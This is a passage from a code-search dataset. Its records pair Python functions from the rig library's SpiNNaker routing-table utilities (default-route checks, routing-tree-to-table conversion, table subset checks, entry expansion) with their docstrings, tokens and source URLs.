"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/remove_default_routes.py#L5-L57 |
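A worked sketch of the rule above — the RoutingTableEntry(route, key, mask, sources) signature is taken from routing_tree_to_tables below, while the Routes enum (with .core(n), .is_link and .opposite) is assumed from rig's public API:
from rig.routing_table import RoutingTableEntry, Routes
from rig.routing_table.remove_default_routes import minimise

table = [
    # Arrives on the west link and leaves on the east link: default-routable.
    RoutingTableEntry({Routes.east}, 0x0000, 0xffff, {Routes.west}),
    # Targets a core, so it can never be default-routed and must stay.
    RoutingTableEntry({Routes.core(1)}, 0x0001, 0xffff, {Routes.west}),
]
assert len(minimise(table, target_length=None)) == 1  # only the core entry remains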
project-rig/rig | rig/routing_table/remove_default_routes.py | _is_defaultable | def _is_defaultable(i, entry, table, check_for_aliases=True):
"""Determine if an entry may be removed from a routing table and be
replaced by a default route.
Parameters
----------
i : int
Position of the entry in the table
entry : RoutingTableEntry
The entry itself
table : [RoutingTableEntry, ...]
The table containing the entry.
check_for_aliases : bool
If True, the table is checked for aliased entries before suggesting a
route may be default routed.
"""
# May only have one source and sink (which may not be None)
if (len(entry.sources) == 1 and
len(entry.route) == 1 and
None not in entry.sources):
# Neither the source nor sink may be a core
source = next(iter(entry.sources))
sink = next(iter(entry.route))
if source.is_link and sink.is_link:
# The source must be going in the same direction as the link
if source.opposite is sink:
# And the entry must not be aliased
key, mask = entry.key, entry.mask
if not check_for_aliases or \
not any(intersect(key, mask, d.key, d.mask) for
d in table[i+1:]):
return True
return False | python | def _is_defaultable(i, entry, table, check_for_aliases=True):
"""Determine if an entry may be removed from a routing table and be
replaced by a default route.
Parameters
----------
i : int
Position of the entry in the table
entry : RoutingTableEntry
The entry itself
table : [RoutingTableEntry, ...]
The table containing the entry.
check_for_aliases : bool
If True, the table is checked for aliased entries before suggesting a
route may be default routed.
"""
# May only have one source and sink (which may not be None)
if (len(entry.sources) == 1 and
len(entry.route) == 1 and
None not in entry.sources):
# Neither the source nor sink may be a core
source = next(iter(entry.sources))
sink = next(iter(entry.route))
if source.is_link and sink.is_link:
# The source must be going in the same direction as the link
if source.opposite is sink:
# And the entry must not be aliased
key, mask = entry.key, entry.mask
if not check_for_aliases or \
not any(intersect(key, mask, d.key, d.mask) for
d in table[i+1:]):
return True
return False | [
"def",
"_is_defaultable",
"(",
"i",
",",
"entry",
",",
"table",
",",
"check_for_aliases",
"=",
"True",
")",
":",
"# May only have one source and sink (which may not be None)",
"if",
"(",
"len",
"(",
"entry",
".",
"sources",
")",
"==",
"1",
"and",
"len",
"(",
"entry",
".",
"route",
")",
"==",
"1",
"and",
"None",
"not",
"in",
"entry",
".",
"sources",
")",
":",
"# Neither the source nor sink may be a core",
"source",
"=",
"next",
"(",
"iter",
"(",
"entry",
".",
"sources",
")",
")",
"sink",
"=",
"next",
"(",
"iter",
"(",
"entry",
".",
"route",
")",
")",
"if",
"source",
".",
"is_link",
"and",
"sink",
".",
"is_link",
":",
"# The source must be going in the same direction as the link",
"if",
"source",
".",
"opposite",
"is",
"sink",
":",
"# And the entry must not be aliased",
"key",
",",
"mask",
"=",
"entry",
".",
"key",
",",
"entry",
".",
"mask",
"if",
"not",
"check_for_aliases",
"or",
"not",
"any",
"(",
"intersect",
"(",
"key",
",",
"mask",
",",
"d",
".",
"key",
",",
"d",
".",
"mask",
")",
"for",
"d",
"in",
"table",
"[",
"i",
"+",
"1",
":",
"]",
")",
":",
"return",
"True",
"return",
"False"
] | Determine if an entry may be removed from a routing table and be
replaced by a default route.
Parameters
----------
i : int
Position of the entry in the table
entry : RoutingTableEntry
The entry itself
table : [RoutingTableEntry, ...]
The table containing the entry.
check_for_aliases : bool
If True, the table is checked for aliased entries before suggesting a
route may be default routed. | [
"Determine",
"if",
"an",
"entry",
"may",
"be",
"removed",
"from",
"a",
"routing",
"table",
"and",
"be",
"replaced",
"by",
"a",
"default",
"route",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/remove_default_routes.py#L60-L93 |
project-rig/rig | rig/routing_table/utils.py | routing_tree_to_tables | def routing_tree_to_tables(routes, net_keys):
"""Convert a set of
:py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip
set of routing tables.
.. warning::
A :py:exc:`rig.routing_table.MultisourceRouteError` will
be raised if entries with identical keys and masks but with differing
routes are generated. This is not a perfect test, entries which would
otherwise collide are not spotted.
.. warning::
The routing trees provided are assumed to be correct and continuous
(not missing any hops). If this is not the case, the output is
undefined.
.. note::
If a routing tree has a terminating vertex whose route is set to None,
that vertex is ignored.
Parameters
----------
routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
...}
The complete set of RoutingTrees representing all routes in the system.
(Note: this is the same data structure produced by routers in the
:py:mod:`~rig.place_and_route` module.)
net_keys : {net: (key, mask), ...}
The key and mask associated with each net.
Returns
-------
    {(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...}
"""
# Pairs of inbound and outbound routes.
InOutPair = namedtuple("InOutPair", "ins, outs")
# {(x, y): {(key, mask): _InOutPair}}
route_sets = defaultdict(OrderedDict)
for net, routing_tree in iteritems(routes):
key, mask = net_keys[net]
# The direction is the Links entry which describes the direction in
# which we last moved to reach the node (or None for the root).
for direction, (x, y), out_directions in routing_tree.traverse():
# Determine the in_direction
in_direction = direction
if in_direction is not None:
in_direction = direction.opposite
# Add a routing entry
if (key, mask) in route_sets[(x, y)]:
# If there is an existing route set raise an error if the out
# directions are not equivalent.
if route_sets[(x, y)][(key, mask)].outs != out_directions:
raise MultisourceRouteError(key, mask, (x, y))
# Otherwise, add the input directions as this represents a
# merge of the routes.
route_sets[(x, y)][(key, mask)].ins.add(in_direction)
else:
# Otherwise create a new route set
route_sets[(x, y)][(key, mask)] = \
InOutPair({in_direction}, set(out_directions))
# Construct the routing tables from the route sets
routing_tables = defaultdict(list)
for (x, y), routes in iteritems(route_sets):
for (key, mask), route in iteritems(routes):
# Add the route
routing_tables[(x, y)].append(
RoutingTableEntry(route.outs, key, mask, route.ins)
)
return routing_tables | python | def routing_tree_to_tables(routes, net_keys):
"""Convert a set of
:py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip
set of routing tables.
.. warning::
A :py:exc:`rig.routing_table.MultisourceRouteError` will
be raised if entries with identical keys and masks but with differing
routes are generated. This is not a perfect test; entries which would
otherwise collide are not spotted.
.. warning::
The routing trees provided are assumed to be correct and continuous
(not missing any hops). If this is not the case, the output is
undefined.
.. note::
If a routing tree has a terminating vertex whose route is set to None,
that vertex is ignored.
Parameters
----------
routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
...}
The complete set of RoutingTrees representing all routes in the system.
(Note: this is the same data structure produced by routers in the
:py:mod:`~rig.place_and_route` module.)
net_keys : {net: (key, mask), ...}
The key and mask associated with each net.
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...}
"""
# Pairs of inbound and outbound routes.
InOutPair = namedtuple("InOutPair", "ins, outs")
# {(x, y): {(key, mask): InOutPair}}
route_sets = defaultdict(OrderedDict)
for net, routing_tree in iteritems(routes):
key, mask = net_keys[net]
# The direction is the Links entry which describes the direction in
# which we last moved to reach the node (or None for the root).
for direction, (x, y), out_directions in routing_tree.traverse():
# Determine the in_direction
in_direction = direction
if in_direction is not None:
in_direction = direction.opposite
# Add a routing entry
if (key, mask) in route_sets[(x, y)]:
# If there is an existing route set raise an error if the out
# directions are not equivalent.
if route_sets[(x, y)][(key, mask)].outs != out_directions:
raise MultisourceRouteError(key, mask, (x, y))
# Otherwise, add the input directions as this represents a
# merge of the routes.
route_sets[(x, y)][(key, mask)].ins.add(in_direction)
else:
# Otherwise create a new route set
route_sets[(x, y)][(key, mask)] = \
InOutPair({in_direction}, set(out_directions))
# Construct the routing tables from the route sets
routing_tables = defaultdict(list)
for (x, y), routes in iteritems(route_sets):
for (key, mask), route in iteritems(routes):
# Add the route
routing_tables[(x, y)].append(
RoutingTableEntry(route.outs, key, mask, route.ins)
)
return routing_tables | [
"def",
"routing_tree_to_tables",
"(",
"routes",
",",
"net_keys",
")",
":",
"# Pairs of inbound and outbound routes.",
"InOutPair",
"=",
"namedtuple",
"(",
"\"InOutPair\"",
",",
"\"ins, outs\"",
")",
"# {(x, y): {(key, mask): _InOutPair}}",
"route_sets",
"=",
"defaultdict",
"(",
"OrderedDict",
")",
"for",
"net",
",",
"routing_tree",
"in",
"iteritems",
"(",
"routes",
")",
":",
"key",
",",
"mask",
"=",
"net_keys",
"[",
"net",
"]",
"# The direction is the Links entry which describes the direction in",
"# which we last moved to reach the node (or None for the root).",
"for",
"direction",
",",
"(",
"x",
",",
"y",
")",
",",
"out_directions",
"in",
"routing_tree",
".",
"traverse",
"(",
")",
":",
"# Determine the in_direction",
"in_direction",
"=",
"direction",
"if",
"in_direction",
"is",
"not",
"None",
":",
"in_direction",
"=",
"direction",
".",
"opposite",
"# Add a routing entry",
"if",
"(",
"key",
",",
"mask",
")",
"in",
"route_sets",
"[",
"(",
"x",
",",
"y",
")",
"]",
":",
"# If there is an existing route set raise an error if the out",
"# directions are not equivalent.",
"if",
"route_sets",
"[",
"(",
"x",
",",
"y",
")",
"]",
"[",
"(",
"key",
",",
"mask",
")",
"]",
".",
"outs",
"!=",
"out_directions",
":",
"raise",
"MultisourceRouteError",
"(",
"key",
",",
"mask",
",",
"(",
"x",
",",
"y",
")",
")",
"# Otherwise, add the input directions as this represents a",
"# merge of the routes.",
"route_sets",
"[",
"(",
"x",
",",
"y",
")",
"]",
"[",
"(",
"key",
",",
"mask",
")",
"]",
".",
"ins",
".",
"add",
"(",
"in_direction",
")",
"else",
":",
"# Otherwise create a new route set",
"route_sets",
"[",
"(",
"x",
",",
"y",
")",
"]",
"[",
"(",
"key",
",",
"mask",
")",
"]",
"=",
"InOutPair",
"(",
"{",
"in_direction",
"}",
",",
"set",
"(",
"out_directions",
")",
")",
"# Construct the routing tables from the route sets",
"routing_tables",
"=",
"defaultdict",
"(",
"list",
")",
"for",
"(",
"x",
",",
"y",
")",
",",
"routes",
"in",
"iteritems",
"(",
"route_sets",
")",
":",
"for",
"(",
"key",
",",
"mask",
")",
",",
"route",
"in",
"iteritems",
"(",
"routes",
")",
":",
"# Add the route",
"routing_tables",
"[",
"(",
"x",
",",
"y",
")",
"]",
".",
"append",
"(",
"RoutingTableEntry",
"(",
"route",
".",
"outs",
",",
"key",
",",
"mask",
",",
"route",
".",
"ins",
")",
")",
"return",
"routing_tables"
] | Convert a set of
:py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip
set of routing tables.
.. warning::
A :py:exc:`rig.routing_table.MultisourceRouteError` will
be raised if entries with identical keys and masks but with differing
routes are generated. This is not a perfect test; entries which would
otherwise collide are not spotted.
.. warning::
The routing trees provided are assumed to be correct and continuous
(not missing any hops). If this is not the case, the output is
undefined.
.. note::
If a routing tree has a terminating vertex whose route is set to None,
that vertex is ignored.
Parameters
----------
routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
...}
The complete set of RoutingTrees representing all routes in the system.
(Note: this is the same data structure produced by routers in the
:py:mod:`~rig.place_and_route` module.)
net_keys : {net: (key, mask), ...}
The key and mask associated with each net.
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...} | [
"Convert",
"a",
"set",
"of",
":",
"py",
":",
"class",
":",
"~rig",
".",
"place_and_route",
".",
"routing_tree",
".",
"RoutingTree",
"s",
"into",
"a",
"per",
"-",
"chip",
"set",
"of",
"routing",
"tables",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/utils.py#L8-L83 |
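The interesting step in `routing_tree_to_tables` is the merge: when a chip sees the same (key, mask) again, the out directions must agree and the in directions accumulate. A minimal sketch of that step follows, with plain strings standing in for rig's `Routes` values and a `ValueError` in place of `MultisourceRouteError`; all names are illustrative.
from collections import OrderedDict, defaultdict

def merge_visit(route_sets, xy, key_mask, in_dir, out_dirs):
    # route_sets maps (x, y) -> OrderedDict of (key, mask) -> (ins, outs).
    if key_mask in route_sets[xy]:
        ins, outs = route_sets[xy][key_mask]
        if outs != set(out_dirs):
            raise ValueError("conflicting routes at {}".format(xy))
        ins.add(in_dir)  # merge: another branch arrives from a new direction
    else:
        route_sets[xy][key_mask] = ({in_dir}, set(out_dirs))

route_sets = defaultdict(OrderedDict)
merge_visit(route_sets, (0, 0), (0xbeef, 0xffff), "south", {"north"})
merge_visit(route_sets, (0, 0), (0xbeef, 0xffff), "west", {"north"})
print(route_sets[(0, 0)][(0xbeef, 0xffff)])  # ({'south', 'west'}, {'north'})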
project-rig/rig | rig/routing_table/utils.py | build_routing_table_target_lengths | def build_routing_table_target_lengths(system_info):
"""Build a dictionary of target routing table lengths from a
:py:class:`~rig.machine_control.machine_controller.SystemInfo` object.
Useful in conjunction with :py:func:`~rig.routing_table.minimise_tables`.
Returns
-------
{(x, y): num, ...}
A dictionary giving the number of free routing table entries on each
chip on a SpiNNaker system.
.. note::
The actual number of entries reported is the size of the largest
contiguous free block of routing entries in the routing table.
"""
return {
(x, y): ci.largest_free_rtr_mc_block
for (x, y), ci in iteritems(system_info)
} | python | def build_routing_table_target_lengths(system_info):
"""Build a dictionary of target routing table lengths from a
:py:class:`~rig.machine_control.machine_controller.SystemInfo` object.
Useful in conjunction with :py:func:`~rig.routing_table.minimise_tables`.
Returns
-------
{(x, y): num, ...}
A dictionary giving the number of free routing table entries on each
chip on a SpiNNaker system.
.. note::
The actual number of entries reported is the size of the largest
contiguous free block of routing entries in the routing table.
"""
return {
(x, y): ci.largest_free_rtr_mc_block
for (x, y), ci in iteritems(system_info)
} | [
"def",
"build_routing_table_target_lengths",
"(",
"system_info",
")",
":",
"return",
"{",
"(",
"x",
",",
"y",
")",
":",
"ci",
".",
"largest_free_rtr_mc_block",
"for",
"(",
"x",
",",
"y",
")",
",",
"ci",
"in",
"iteritems",
"(",
"system_info",
")",
"}"
] | Build a dictionary of target routing table lengths from a
:py:class:`~rig.machine_control.machine_controller.SystemInfo` object.
Useful in conjunction with :py:func:`~rig.routing_table.minimise_tables`.
Returns
-------
{(x, y): num, ...}
A dictionary giving the number of free routing table entries on each
chip on a SpiNNaker system.
.. note::
The actual number of entries reported is the size of the largest
contiguous free block of routing entries in the routing table. | [
"Build",
"a",
"dictionary",
"of",
"target",
"routing",
"table",
"lengths",
"from",
"a",
":",
"py",
":",
"class",
":",
"~rig",
".",
"machine_control",
".",
"machine_controller",
".",
"SystemInfo",
"object",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/utils.py#L86-L105 |
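Since the function above only needs a mapping from (x, y) to objects exposing a `largest_free_rtr_mc_block` attribute, a stub suffices for a usage sketch; `ChipInfoStub` is illustrative, and it is assumed that `build_routing_table_target_lengths` is importable.
from collections import namedtuple

ChipInfoStub = namedtuple("ChipInfoStub", "largest_free_rtr_mc_block")

system_info = {(0, 0): ChipInfoStub(1023), (1, 0): ChipInfoStub(900)}
print(build_routing_table_target_lengths(system_info))
# {(0, 0): 1023, (1, 0): 900}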
project-rig/rig | rig/routing_table/utils.py | table_is_subset_of | def table_is_subset_of(entries_a, entries_b):
"""Check that every key matched by every entry in one table results in the
same route when checked against the other table.
For example, the table::
>>> from rig.routing_table import Routes
>>> table = [
... RoutingTableEntry({Routes.north, Routes.north_east}, 0x0, 0xf),
... RoutingTableEntry({Routes.east}, 0x1, 0xf),
... RoutingTableEntry({Routes.south_west}, 0x5, 0xf),
... RoutingTableEntry({Routes.north, Routes.north_east}, 0x8, 0xf),
... RoutingTableEntry({Routes.east}, 0x9, 0xf),
... RoutingTableEntry({Routes.south_west}, 0xe, 0xf),
... RoutingTableEntry({Routes.north, Routes.north_east}, 0xc, 0xf),
... RoutingTableEntry({Routes.south, Routes.south_west}, 0x0, 0xb),
... ]
is a functional subset of a minimised version of itself::
>>> from rig.routing_table.ordered_covering import minimise
>>> other_table = minimise(table, target_length=None)
>>> other_table == table
False
>>> table_is_subset_of(table, other_table)
True
But not vice-versa::
>>> table_is_subset_of(other_table, table)
False
Default routes are taken into account, such that the table::
>>> table = [
... RoutingTableEntry({Routes.north}, 0x0, 0xf, {Routes.south}),
... ]
is a subset of the empty table::
>>> table_is_subset_of(table, list())
True
Parameters
----------
entries_a : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
entries_b : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Ordered lists of routing table entries to compare.
Returns
-------
bool
True if every key matched in `entries_a` would result in an equivalent
route for the packet when matched in `entries_b`.
"""
# Determine which bits we don't need to explicitly test for
common_xs = get_common_xs(entries_b)
# For every entry in the first table
for entry in expand_entries(entries_a, ignore_xs=common_xs):
# Look at every entry in the second table
for other_entry in entries_b:
# If the first entry matches the second
if other_entry.mask & entry.key == other_entry.key:
if other_entry.route == entry.route:
# If the route is the same then we move on to the next
# entry in the first table.
break
else:
# Otherwise we return false as the tables are different
return False
else:
# If we didn't break out of the loop then the entry from the first
# table never matched an entry in the second table. If the entry
# from the first table could not be default routed we return False
# as the tables cannot be equivalent.
default_routed = False
if len(entry.route) == 1 and len(entry.sources) == 1:
source = next(iter(entry.sources))
sink = next(iter(entry.route))
if (source is not None and
sink.is_link and
source is sink.opposite):
default_routed = True
if not default_routed:
return False
return True | python | def table_is_subset_of(entries_a, entries_b):
"""Check that every key matched by every entry in one table results in the
same route when checked against the other table.
For example, the table::
>>> from rig.routing_table import Routes
>>> table = [
... RoutingTableEntry({Routes.north, Routes.north_east}, 0x0, 0xf),
... RoutingTableEntry({Routes.east}, 0x1, 0xf),
... RoutingTableEntry({Routes.south_west}, 0x5, 0xf),
... RoutingTableEntry({Routes.north, Routes.north_east}, 0x8, 0xf),
... RoutingTableEntry({Routes.east}, 0x9, 0xf),
... RoutingTableEntry({Routes.south_west}, 0xe, 0xf),
... RoutingTableEntry({Routes.north, Routes.north_east}, 0xc, 0xf),
... RoutingTableEntry({Routes.south, Routes.south_west}, 0x0, 0xb),
... ]
is a functional subset of a minimised version of itself::
>>> from rig.routing_table.ordered_covering import minimise
>>> other_table = minimise(table, target_length=None)
>>> other_table == table
False
>>> table_is_subset_of(table, other_table)
True
But not vice-versa::
>>> table_is_subset_of(other_table, table)
False
Default routes are taken into account, such that the table::
>>> table = [
... RoutingTableEntry({Routes.north}, 0x0, 0xf, {Routes.south}),
... ]
is a subset of the empty table::
>>> table_is_subset_of(table, list())
True
Parameters
----------
entries_a : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
entries_b : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Ordered lists of routing table entries to compare.
Returns
-------
bool
True if every key matched in `entries_a` would result in an equivalent
route for the packet when matched in `entries_b`.
"""
# Determine which bits we don't need to explicitly test for
common_xs = get_common_xs(entries_b)
# For every entry in the first table
for entry in expand_entries(entries_a, ignore_xs=common_xs):
# Look at every entry in the second table
for other_entry in entries_b:
# If the first entry matches the second
if other_entry.mask & entry.key == other_entry.key:
if other_entry.route == entry.route:
# If the route is the same then we move on to the next
# entry in the first table.
break
else:
# Otherwise we return false as the tables are different
return False
else:
# If we didn't break out of the loop then the entry from the first
# table never matched an entry in the second table. If the entry
# from the first table could not be default routed we return False
# as the tables cannot be equivalent.
default_routed = False
if len(entry.route) == 1 and len(entry.sources) == 1:
source = next(iter(entry.sources))
sink = next(iter(entry.route))
if (source is not None and
sink.is_link and
source is sink.opposite):
default_routed = True
if not default_routed:
return False
return True | [
"def",
"table_is_subset_of",
"(",
"entries_a",
",",
"entries_b",
")",
":",
"# Determine which bits we don't need to explicitly test for",
"common_xs",
"=",
"get_common_xs",
"(",
"entries_b",
")",
"# For every entry in the first table",
"for",
"entry",
"in",
"expand_entries",
"(",
"entries_a",
",",
"ignore_xs",
"=",
"common_xs",
")",
":",
"# Look at every entry in the second table",
"for",
"other_entry",
"in",
"entries_b",
":",
"# If the first entry matches the second",
"if",
"other_entry",
".",
"mask",
"&",
"entry",
".",
"key",
"==",
"other_entry",
".",
"key",
":",
"if",
"other_entry",
".",
"route",
"==",
"entry",
".",
"route",
":",
"# If the route is the same then we move on to the next",
"# entry in the first table.",
"break",
"else",
":",
"# Otherwise we return false as the tables are different",
"return",
"False",
"else",
":",
"# If we didn't break out of the loop then the entry from the first",
"# table never matched an entry in the second table. If the entry",
"# from the first table could not be default routed we return False",
"# as the tables cannot be equivalent.",
"default_routed",
"=",
"False",
"if",
"len",
"(",
"entry",
".",
"route",
")",
"==",
"1",
"and",
"len",
"(",
"entry",
".",
"sources",
")",
"==",
"1",
":",
"source",
"=",
"next",
"(",
"iter",
"(",
"entry",
".",
"sources",
")",
")",
"sink",
"=",
"next",
"(",
"iter",
"(",
"entry",
".",
"route",
")",
")",
"if",
"(",
"source",
"is",
"not",
"None",
"and",
"sink",
".",
"is_link",
"and",
"source",
"is",
"sink",
".",
"opposite",
")",
":",
"default_routed",
"=",
"True",
"if",
"not",
"default_routed",
":",
"return",
"False",
"return",
"True"
] | Check that every key matched by every entry in one table results in the
same route when checked against the other table.
For example, the table::
>>> from rig.routing_table import Routes
>>> table = [
... RoutingTableEntry({Routes.north, Routes.north_east}, 0x0, 0xf),
... RoutingTableEntry({Routes.east}, 0x1, 0xf),
... RoutingTableEntry({Routes.south_west}, 0x5, 0xf),
... RoutingTableEntry({Routes.north, Routes.north_east}, 0x8, 0xf),
... RoutingTableEntry({Routes.east}, 0x9, 0xf),
... RoutingTableEntry({Routes.south_west}, 0xe, 0xf),
... RoutingTableEntry({Routes.north, Routes.north_east}, 0xc, 0xf),
... RoutingTableEntry({Routes.south, Routes.south_west}, 0x0, 0xb),
... ]
is a functional subset of a minimised version of itself::
>>> from rig.routing_table.ordered_covering import minimise
>>> other_table = minimise(table, target_length=None)
>>> other_table == table
False
>>> table_is_subset_of(table, other_table)
True
But not vice-versa::
>>> table_is_subset_of(other_table, table)
False
Default routes are taken into account, such that the table::
>>> table = [
... RoutingTableEntry({Routes.north}, 0x0, 0xf, {Routes.south}),
... ]
is a subset of the empty table::
>>> table_is_subset_of(table, list())
True
Parameters
----------
entries_a : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
entries_b : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Ordered lists of routing table entries to compare.
Returns
-------
bool
True if every key matched in `entries_a` would result in an equivalent
route for the packet when matched in `entries_b`. | [
"Check",
"that",
"every",
"key",
"matched",
"by",
"every",
"entry",
"in",
"one",
"table",
"results",
"in",
"the",
"same",
"route",
"when",
"checked",
"against",
"the",
"other",
"table",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/utils.py#L108-L198 |
project-rig/rig | rig/routing_table/utils.py | expand_entry | def expand_entry(entry, ignore_xs=0x0):
"""Turn all Xs which are not marked in `ignore_xs` into ``0``\ s and
``1``\ s.
The following will expand any Xs in bits ``1..3``\ ::
>>> entry = RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100)
>>> list(expand_entry(entry, 0xfffffff1)) == [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1110), # 010X
... RoutingTableEntry(set(), 0b0110, 0xfffffff0 | 0b1110), # 011X
... ]
True
Parameters
----------
entry : :py:class:`~rig.routing_table.RoutingTableEntry` or similar
The entry to expand.
ignore_xs : int
Bit-mask of Xs which should not be expanded.
Yields
------
:py:class:`~rig.routing_table.RoutingTableEntry`
Routing table entries which represent the original entry but with all
Xs not masked off by `ignore_xs` replaced with 1s and 0s.
"""
# Get all the Xs in the entry that are not ignored
xs = (~entry.key & ~entry.mask) & ~ignore_xs
# Find the most significant X
for bit in (1 << i for i in range(31, -1, -1)):
if bit & xs:
# Yield all the entries with this bit set as 0
entry_0 = RoutingTableEntry(entry.route, entry.key,
entry.mask | bit, entry.sources)
for new_entry in expand_entry(entry_0, ignore_xs):
yield new_entry
# And yield all the entries with this bit set as 1
entry_1 = RoutingTableEntry(entry.route, entry.key | bit,
entry.mask | bit, entry.sources)
for new_entry in expand_entry(entry_1, ignore_xs):
yield new_entry
# Stop looking for Xs
break
else:
# If there are no Xs then yield the entry we were given.
yield entry | python | def expand_entry(entry, ignore_xs=0x0):
"""Turn all Xs which are not marked in `ignore_xs` into ``0``\ s and
``1``\ s.
The following will expand any Xs in bits ``1..3``\ ::
>>> entry = RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100)
>>> list(expand_entry(entry, 0xfffffff1)) == [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1110), # 010X
... RoutingTableEntry(set(), 0b0110, 0xfffffff0 | 0b1110), # 011X
... ]
True
Parameters
----------
entry : :py:class:`~rig.routing_table.RoutingTableEntry` or similar
The entry to expand.
ignore_xs : int
Bit-mask of Xs which should not be expanded.
Yields
------
:py:class:`~rig.routing_table.RoutingTableEntry`
Routing table entries which represent the original entry but with all
Xs not masked off by `ignore_xs` replaced with 1s and 0s.
"""
# Get all the Xs in the entry that are not ignored
xs = (~entry.key & ~entry.mask) & ~ignore_xs
# Find the most significant X
for bit in (1 << i for i in range(31, -1, -1)):
if bit & xs:
# Yield all the entries with this bit set as 0
entry_0 = RoutingTableEntry(entry.route, entry.key,
entry.mask | bit, entry.sources)
for new_entry in expand_entry(entry_0, ignore_xs):
yield new_entry
# And yield all the entries with this bit set as 1
entry_1 = RoutingTableEntry(entry.route, entry.key | bit,
entry.mask | bit, entry.sources)
for new_entry in expand_entry(entry_1, ignore_xs):
yield new_entry
# Stop looking for Xs
break
else:
# If there are no Xs then yield the entry we were given.
yield entry | [
"def",
"expand_entry",
"(",
"entry",
",",
"ignore_xs",
"=",
"0x0",
")",
":",
"# Get all the Xs in the entry that are not ignored",
"xs",
"=",
"(",
"~",
"entry",
".",
"key",
"&",
"~",
"entry",
".",
"mask",
")",
"&",
"~",
"ignore_xs",
"# Find the most significant X",
"for",
"bit",
"in",
"(",
"1",
"<<",
"i",
"for",
"i",
"in",
"range",
"(",
"31",
",",
"-",
"1",
",",
"-",
"1",
")",
")",
":",
"if",
"bit",
"&",
"xs",
":",
"# Yield all the entries with this bit set as 0",
"entry_0",
"=",
"RoutingTableEntry",
"(",
"entry",
".",
"route",
",",
"entry",
".",
"key",
",",
"entry",
".",
"mask",
"|",
"bit",
",",
"entry",
".",
"sources",
")",
"for",
"new_entry",
"in",
"expand_entry",
"(",
"entry_0",
",",
"ignore_xs",
")",
":",
"yield",
"new_entry",
"# And yield all the entries with this bit set as 1",
"entry_1",
"=",
"RoutingTableEntry",
"(",
"entry",
".",
"route",
",",
"entry",
".",
"key",
"|",
"bit",
",",
"entry",
".",
"mask",
"|",
"bit",
",",
"entry",
".",
"sources",
")",
"for",
"new_entry",
"in",
"expand_entry",
"(",
"entry_1",
",",
"ignore_xs",
")",
":",
"yield",
"new_entry",
"# Stop looking for Xs",
"break",
"else",
":",
"# If there are no Xs then yield the entry we were given.",
"yield",
"entry"
] | Turn all Xs which are not marked in `ignore_xs` into ``0``\ s and
``1``\ s.
The following will expand any Xs in bits ``1..3``\ ::
>>> entry = RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100)
>>> list(expand_entry(entry, 0xfffffff1)) == [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1110), # 010X
... RoutingTableEntry(set(), 0b0110, 0xfffffff0 | 0b1110), # 011X
... ]
True
Parameters
----------
entry : :py:class:`~rig.routing_table.RoutingTableEntry` or similar
The entry to expand.
ignore_xs : int
Bit-mask of Xs which should not be expanded.
Yields
------
:py:class:`~rig.routing_table.RoutingTableEntry`
Routing table entries which represent the original entry but with all
Xs not masked off by `ignore_xs` replaced with 1s and 0s. | [
"Turn",
"all",
"Xs",
"which",
"are",
"not",
"marked",
"in",
"ignore_xs",
"into",
"0",
"\\",
"s",
"and",
"1",
"\\",
"s",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/utils.py#L234-L282 |
project-rig/rig | rig/routing_table/utils.py | expand_entries | def expand_entries(entries, ignore_xs=None):
"""Turn all Xs which are not ignored in all entries into ``0`` s and
``1`` s.
For example::
>>> from rig.routing_table import RoutingTableEntry
>>> entries = [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1100), # 01XX
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b0010), # XX1X
... ]
>>> list(expand_entries(entries)) == [
... RoutingTableEntry(set(), 0b0100, 0xfffffff0 | 0b1110), # 010X
... RoutingTableEntry(set(), 0b0110, 0xfffffff0 | 0b1110), # 011X
... RoutingTableEntry(set(), 0b0010, 0xfffffff0 | 0b1110), # 001X
... RoutingTableEntry(set(), 0b1010, 0xfffffff0 | 0b1110), # 101X
... RoutingTableEntry(set(), 0b1110, 0xfffffff0 | 0b1110), # 111X
... ]
True
Note that the ``X`` in the LSB was retained because it is common to all
entries.
Any duplicated entries will be removed (in this case the first and second
entries will both match ``0000``, so when the second entry is expanded only
one entry is retained)::
>>> from rig.routing_table import Routes
>>> entries = [
... RoutingTableEntry({Routes.north}, 0b0000, 0b1111), # 0000 -> N
... RoutingTableEntry({Routes.south}, 0b0000, 0b1011), # 0X00 -> S
... ]
>>> list(expand_entries(entries)) == [
... RoutingTableEntry({Routes.north}, 0b0000, 0b1111), # 0000 -> N
... RoutingTableEntry({Routes.south}, 0b0100, 0b1111), # 0100 -> S
... ]
True
.. warning::
It is assumed that the input routing table is orthogonal (i.e., there
are no two entries which would match the same key). If this is not the
